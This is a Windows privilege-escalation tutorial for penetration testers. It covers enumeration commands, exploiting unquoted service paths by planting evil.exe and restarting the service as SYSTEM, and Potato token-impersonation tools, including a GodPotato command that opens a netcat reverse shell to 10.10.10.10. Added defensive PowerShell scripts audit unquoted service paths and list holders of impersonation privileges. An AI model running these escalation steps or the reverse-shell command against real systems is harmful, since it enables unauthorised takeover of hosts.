Key Takeaways

  • Unquoted service paths allow arbitrary executable injection.
  • DLL Hijacking: Replace missing DLLs with malicious ones.
  • Potato attacks: NTLM relay for service account escalation.
  • Always run WinPEAS/PowerUp for enumeration.

Windows privilege escalation is essential for penetration testers. After gaining initial access, these techniques help escalate from a standard user to Administrator or SYSTEM.

Enumeration Commands

# System info
systeminfo
hostname
whoami /all

# Users and groups
net user
net localgroup Administrators

# Running services
tasklist /SVC
sc query

# AutoRuns
schtasks /query /fo LIST /v
wmic startup get caption,command

Unquoted Service Paths

# Find candidate services: auto-start, outside C:\Windows, and not already quoted
# (the doubled backslash and the """ filter avoid findstr's escaping quirks)
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

# If path is: C:\Program Files\My App\service.exe
# Windows tries (in order):
# C:\Program.exe
# C:\Program Files\My.exe
# C:\Program Files\My App\service.exe

# Drop the executable at the writable intermediate location. This only works if that
# directory's ACL grants write access to your user; C:\Program Files is not writable by default.
copy evil.exe "C:\Program Files\My.exe"
sc stop VulnService
# Restarting the service executes evil.exe as SYSTEM
sc start VulnService
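From the defender's side the same condition is something to audit and remediate rather than exploit. The following PowerShell script is an added example, not code from the original page: it reads each service's ImagePath from the Services registry key (assumed to be HKLM:\SYSTEM\CurrentControlSet\Services), reports every unquoted path that contains a space together with the intermediate names Windows would probe, and, when run with the hypothetical -Fix switch, rewrites the value with quotes. It also avoids wmic, which is deprecated and absent from recent Windows builds.

```powershell
# Added example (not from the original page): audit services for unquoted ImagePath
# values containing spaces, show the intermediate names Windows would probe, and
# optionally quote the path in place. Run from an elevated PowerShell prompt.
# Assumption: service definitions live under HKLM:\SYSTEM\CurrentControlSet\Services.
param(
    [switch]$Fix   # hypothetical switch: when set, rewrite the offending ImagePath with quotes
)

function Get-UnquotedServicePath {
    $base = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    Get-ChildItem $base | ForEach-Object {
        $props = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
        $image = $props.ImagePath
        if (-not $image) { return }
        # Already quoted paths are not ambiguous
        if ($image.TrimStart().StartsWith('"')) { return }
        # Executable part = everything up to the first ".exe"; the rest are arguments
        $m = [regex]::Match($image, '^(?<exe>.+?\.exe)(?<args>.*)$', 'IgnoreCase')
        if (-not $m.Success) { return }           # drivers (.sys) and odd entries are skipped
        $exe = $m.Groups['exe'].Value
        if ($exe -notmatch ' ') { return }        # no space, no ambiguity
        if ($exe -notmatch '^[A-Za-z]:\\') { return }  # relative paths are resolved differently
        [pscustomobject]@{
            Name      = $_.PSChildName
            ImagePath = $image
            Exe       = $exe
            Args      = $m.Groups['args'].Value
            PSPath    = $_.PSPath
        }
    }
}

$findings = @(Get-UnquotedServicePath)
if ($findings.Count -eq 0) {
    Write-Host 'No unquoted service paths with spaces found.'
    return
}

foreach ($f in $findings) {
    Write-Host ("[!] {0}: {1}" -f $f.Name, $f.ImagePath)
    # Reproduce the lookup order CreateProcess uses: each prefix up to a space, plus .exe
    $parts = $f.Exe.Split(' ')
    for ($i = 1; $i -lt $parts.Length; $i++) {
        Write-Host ("      would probe: {0}.exe" -f ($parts[0..($i - 1)] -join ' '))
    }
    if ($Fix) {
        $quoted = '"{0}"{1}' -f $f.Exe, $f.Args
        Set-ItemProperty -Path $f.PSPath -Name ImagePath -Value $quoted
        Write-Host ("      fixed -> {0}" -f $quoted)
    }
}
```

Run it without -Fix first to review the list; the "would probe" lines are exactly the locations whose directory ACLs decide whether the finding is exploitable, so checking that standard users cannot write there is the second half of the audit.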

Token Impersonation (Potato)

# Check privileges
whoami /priv
# Need: SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege

# JuicyPotato (Windows versions before Server 2019)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t *

# PrintSpoofer (Windows 10/Server 2019+)
PrintSpoofer.exe -i -c cmd

# GodPotato (Universal)
GodPotato.exe -cmd "nc.exe 10.10.10.10 4444 -e cmd"
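The hardening question that follows from this section is which principals on a host actually hold SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege. The PowerShell script below is an added example, not code from the original page: it exports the local user-rights assignment with secedit, resolves the SIDs for those two privileges to account names, and prints the holders. The temporary file name is constructed; the privilege names and the default holders (Administrators, LOCAL SERVICE, NETWORK SERVICE and the SERVICE group) are Microsoft's documented defaults.

```powershell
# Added example (not from the original page): list which principals hold the two
# privileges the Potato family depends on, so extra grants can be spotted and removed.
# Requires an elevated prompt (secedit needs it). Temp file name is constructed.
$watch = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'

function Resolve-SidString {
    param([string]$Id)
    # secedit writes SIDs prefixed with '*'; names may also appear verbatim
    if (-not $Id.StartsWith('*')) { return $Id }
    try {
        $sid = New-Object System.Security.Principal.SecurityIdentifier($Id.Substring(1))
        return $sid.Translate([System.Security.Principal.NTAccount]).Value
    } catch {
        return $Id   # unresolvable (deleted account or foreign domain SID)
    }
}

function Get-PrivilegeHolders {
    param([string[]]$Privileges)
    $cfg = Join-Path $env:TEMP 'user-rights-export.inf'   # constructed temp file
    secedit.exe /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    $holders = @{}
    foreach ($line in Get-Content $cfg) {
        # Lines look like: SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20
        if ($line -match '^(Se\w+Privilege)\s*=\s*(.*)$' -and $Privileges -contains $Matches[1]) {
            $holders[$Matches[1]] = $Matches[2].Split(',') |
                ForEach-Object { Resolve-SidString $_.Trim() }
        }
    }
    Remove-Item $cfg -ErrorAction SilentlyContinue
    return $holders
}

$result = Get-PrivilegeHolders -Privileges $watch
foreach ($p in $watch) {
    Write-Host "$p is held by:"
    if ($result.ContainsKey($p)) {
        $result[$p] | ForEach-Object { Write-Host "    $_" }
    } else {
        Write-Host '    (nobody)'
    }
}
# Note: every service logon is a member of SERVICE (S-1-5-6), a default holder of
# SeImpersonatePrivilege, so the list is most useful for spotting extra grants to
# ordinary users or groups that the local policy or a GPO has added.
```

Because the SERVICE group is a default holder, the practical mitigations are keeping the OS patched (which is what retired JuicyPotato on Server 2019), disabling the Print Spooler where it is not needed, and minimising the chance of code execution under service accounts in the first place; this script tells you whether a baseline has widened the default grants beyond that.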

Essential Tools

  • WinPEAS: Automated privilege escalation enumeration
  • PowerUp: PowerShell privesc scanner
  • Seatbelt: Security-focused host survey
  • SharpUp: C# port of PowerUp

Frequently Asked Questions

What's the difference between Admin and SYSTEM?
Administrator is the highest-privileged user account. SYSTEM is the local machine account, with even more privileges: it can access registry hives and perform operations that even Administrators can't.
